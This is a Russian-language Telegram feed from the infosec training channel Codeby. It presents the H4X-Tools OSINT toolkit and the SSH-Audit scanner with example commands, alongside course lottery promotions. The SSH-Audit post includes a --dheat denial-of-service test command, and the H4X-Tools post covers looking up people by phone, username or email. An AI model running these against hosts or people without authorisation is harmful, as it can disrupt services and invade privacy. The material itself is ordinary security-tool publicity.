Читать полностью…

Codeby

H4X-Tools

H4X-Tools - Набор инструментов с открытым исходным кодом для сбора данных, OSINT и многого другого.

📕Характеристика:
Веб-поиск: Выполняет поиск в Интернете по заданному запросу.
Поиск номера телефона: Ищет номер телефона и возвращает информацию о нем.
Сканер Портов: Сканирует открытые порты по заданному IP-адресу/домену.
Поиск по нику: Пытается найти заданное имя пользователя на многих разных веб-сайтах.
Поиск по почте: Эффективно находит зарегистрированные аккаунты по заданному адресу электронной почты.

💻Установка:

git clone https://github.com/vil/H4X-Tools.git

cd H4X-Tools

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 h4xtools.py

#osint #cybersecurity


➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

📣ПОСЛЕДНИЙ ШАНС! ИТОГИ НОВОГОДНЕЙ ЛОТЕРЕИ CODEBY УЖЕ СЕГОДНЯ!🎁

Сегодня в 21:00 (МСК) определим 10 победителей в прямом эфире!

У вас еще есть время, чтобы войти в число участников на: iPhone 17, Apple Watch, AirPods и подписки HackerLab PRO.

Для этого нужно приобрести любой курс стартующий в 2026 году. Каждая покупка — ваш лотерейный билет.

Розыгрыш: СЕГОДНЯ, 12 января, 21:00 МСК.
Выбрать курс и успеть участвовать
🥇 Для связи с менеджером @CodebyAcademyBot

🔗Ознакомиться с условиями розыгрыша здесь!

Не упустите свой шанс на новогодний подарок от CODEBY! Удачи!

#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity

Читать полностью…

Codeby

SSH-Audit: Комплексный аудит конфигураций SSH-серверов и клиентов

SSH-Audit — это инструмент командной строки, предназначенный для глубокого анализа конфигурации безопасности SSH на удаленных серверах и клиентах. Его основная задача — проверка поддерживаемых алгоритмов обмена ключами, шифрования, аутентификации сообщений, а также выявление устаревших, слабых или небезопасных настроек путем пассивного сбора информации от целевого хоста. В отличие от ручной проверки, SSH-Audit предоставляет структурированный, детальный отчет с цветовой индикацией рисков и конкретными рекомендациями по исправлению.


👍 Возможности
- Анализ всех алгоритмов обмена ключами (kex), шифрования (enc), аутентификации (mac) и сжатия, поддерживаемых сервером или клиентом
- Для каждого алгоритма показывает историю изменений в OpenSSH/Dropbear, помечает устаревшие и слабые варианты, дает команды для исправления конфигурации
- Встроенная проверка на соответствие стандартам безопасности (CIS, базовые настройки ОС) с использованием готовых или пользовательских политик
- Запуск временного сервера для анализа алгоритмов, которые используют подключающиеся клиенты
- Определение типа и версии SSH-сервера, а также операционной системы по баннеру
- Проведение тестов на специфические уязвимости (например, DHEat/CVE-2002-20001)
- Цветной читаемый отчет или структурированный JSON для интеграции в системы автоматического мониторинга (SIEM)

➡️ Установка
sudo apt install ssh-audit 

Проверка
ssh-audit -h


➡️ Базовое сканирование сервера
ssh-audit 192.168.1.100

Эта команда выполнит полный аудит SSH-сервера на стандартном порту 22 и выведет детальный отчет с оценкой ([fail], [warn], [info]) для каждого алгоритма

➡️ Сканирование с указанием порта
ssh-audit -p 2222 example.com

Полезно для проверки сервисов, работающих на нестандартных портах, например, в тестовых или изолированных средах

➡️ Массовое сканирование с проверкой по политике
ssh-audit --targets=hosts.txt --policy="OpenSSH 8.9" --threads=10

С помощью флага --targets указывается файл со списком хостов (по одному на строку, в формате хост:порт). Флаг --policy запускает проверку каждого хоста на соответствие заданной встроенной политике безопасности, а --threads управляет параллелизмом сканирования для ускорения процесса

➡️ Тест на уязвимость DHEat
ssh-audit --dheat=5:diffie-hellman-group-exchange-sha256 example.com

Флаг --dheat активирует тест для проверки уязвимости CVE-2002-20001 (DHEat), который может привести к отказу в обслуживании. В данном примере тест выполняется с 5 одновременными соединениями, используя указанный алгоритм обмена ключами

👎 Недостатки
- Инструмент не проводит активных эксплойтов или глубокого тестирования на проникновение. Он лишь отражает объявленную сервером конфигурацию
- Определение версии ПО основывается на баннере, который может быть изменен администратором в целях безопасности (security through obscurity)
- Не оценивает стойкость паролей или ключей, фокусируясь исключительно на настройках протокола

#tools #SSH #audit #CIS

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Codeby

🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY🎄

ИТОГИ УЖЕ ЗАВТРА! РОЗЫГРЫШ В ПРЯМОМ ЭФИРЕ 12 ЯНВАРЯ В 21:00 МСК!


Дорогие друзья!

Команда CODEBY поздравляет вас с наступившим Новым годом! Спасибо, что выбираете нас — нам очень приятно видеть, как наши студенты превращаются в специалистов высшего класса.

Именно поэтому мы решили сделать вам новогодние подарки! 🎁

📣ОБЪЯВЛЯЕМ ЛОТЕРЕЮ

Как участвовать:
Купите любой курс, стартующий в 2026 году
• Получите индивидуальный номер участника
Чем больше курсов — тем выше шансы на победу!

Период проведения:
🗓26 декабря 2025 — 12 января 2026
Розыгрыш в прямом эфире 12 января в 21:00 МСК

🏆 ПРИЗОВОЙ ФОНД

🥇 1 место — iPhone 17
🥈 2 место — Apple Watch
🥉 3 место — AirPods
🎁 4-10 места — подписка HackerLab PRO на 1 месяц

Итого: 10 победителей!

🚀Успей принять участие — времени остается все меньше!

➡️ Выбрать курс
🥇 Для связи с менеджером @CodebyAcademyBot

Всем желаем удачи! 🚀

Ознакомиться с условиями розыгрыша здесь!

#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity

Читать полностью…

Codeby

Информативная картинка о том, как работает LFI и что это такое.

#LFI #Web #Picture

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…
Subscribe to a channel